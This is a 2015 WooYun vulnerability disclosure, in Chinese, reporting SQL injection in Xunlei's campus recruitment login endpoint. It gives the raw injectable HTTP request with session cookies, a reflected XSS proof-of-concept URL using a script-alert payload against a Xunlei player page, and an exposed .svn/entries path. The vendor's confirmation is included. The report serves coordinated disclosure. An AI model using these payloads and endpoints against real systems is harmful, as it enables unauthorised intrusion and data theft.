当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089804

漏洞标题:迅雷一处注入

相关厂商:迅雷

漏洞作者: Croxy

提交时间:2015-01-03 14:02

修复时间:2015-02-17 14:04

公开时间:2015-02-17 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-03: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向核心白帽子及相关领域专家公开
2015-01-24: 细节向普通白帽子公开
2015-02-03: 细节向实习白帽子公开
2015-02-17: 细节向公众公开

简要描述:

听说迅雷是个好公司

详细说明:

在迅雷校招登入处有注入 http://campus.xunlei.com/

GET /login?account=aaa%40test.com&pwd=admin&from=mo&callback=jQuery183006059867197172708_1420216468993&_=1420216825050 HTTP/1.1
Host: svr.campus.xunlei.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://campus.xunlei.com/mobile/t/login.html
Cookie: pgv_pvi=8017659823; niuxbbs_8763_saltkey=qmc2M2bV; niuxbbs_8763_lastvisit=1420161936; niuxbbs_8763_sid=iEEb9r; niuxbbs_8763_lastact=1420165616%09home.php%09space; _ga=GA1.2.977311208.1420171555; check_e=AQAB; check_n=ojx%2Fc8S645rVboX1LNLZyFrRze18YlpFCzh4rxTwS2N7yTALd6%2BSIewRa4p26y2TA4OXvOZf29E9k1onzu95E8qWXxfQs0lI5e6Y%2BAs7qw0%2F52Iw%2B8YabQhYxyFALLRdwZZ9R%2F%2FL9W8XXejTPKRhmxZz9JRrwlCFfioGfDjkyzjS%2FFu531puZHdFi7G1gSKxbp7V0L7YL%2B0iSQOrPyeC5c7eivOsLzq%2Fkv9yKtF7PtNK0QWAKfum8HtqhBuI4y7CwuqRebhzl6Z5cZWJg8hsqgEeMHvvIaxUROzROSGMiJzvCt7Ms7DxY4rOPdyCFb1hBvl5L7CCafguOvJ0fovI5w%3D%3D; _x_t_=0; userid=347711301; sessionid=A51904D69B0738C9006FF784C8418EFBB86360247C6D1E251B780CF57EDD272FF8286E401DBB995117EB10B16C724DED58D6F968FF3E2E0191F20B9B9796802D; nickname=Gankme; __utma=166345655.977311208.1420171555.1420210757.1420210757.1; __utmc=166345655; __utmz=166345655.1420210757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); usrname=; active=1; downbyte=0; downfile=0; isspwd=0; isvip=0; jumpkey=D252A52542409BDC1DFEC96D44B57E75DFB344C58A67B67A32A1C64FA39611B287EDEA1BE8274128B88E6EC717DE6079B5E33D9119D255F4ED07D9CCD9F799B50A9EA7BA1C76E294827CF5210BA8053FB352FB8181AE23FFFE87FC35AF6C3094; logintype=1; onlinetime=0; order=165908730; safe=0; score=200; sex=u; upgrade=0; usernewno=xxxxx; usernick=xxx; usertype=0
Connection: keep-alive


漏洞证明:

xunlei1.png


1.png


xunlei2.png


有多少简历。。。你们懂得>..<
买一送一
xss

http://player.client.daquan.xunlei.com/player.php?source_id=16245%273&type=movie&source_type=&title=%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3E&play_link=&flash_play_link=&ts=1355167569


.svn

widget.xunlei.com/js/.svn/entries

修复方案:

测试下注出的数据已经删除!没有做任何保留!
过滤 >..< 不要太相信Js判断了

版权声明:转载请注明来源 Croxy@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-04 09:52

厂商回复:

多谢反馈!

最新状态:

暂无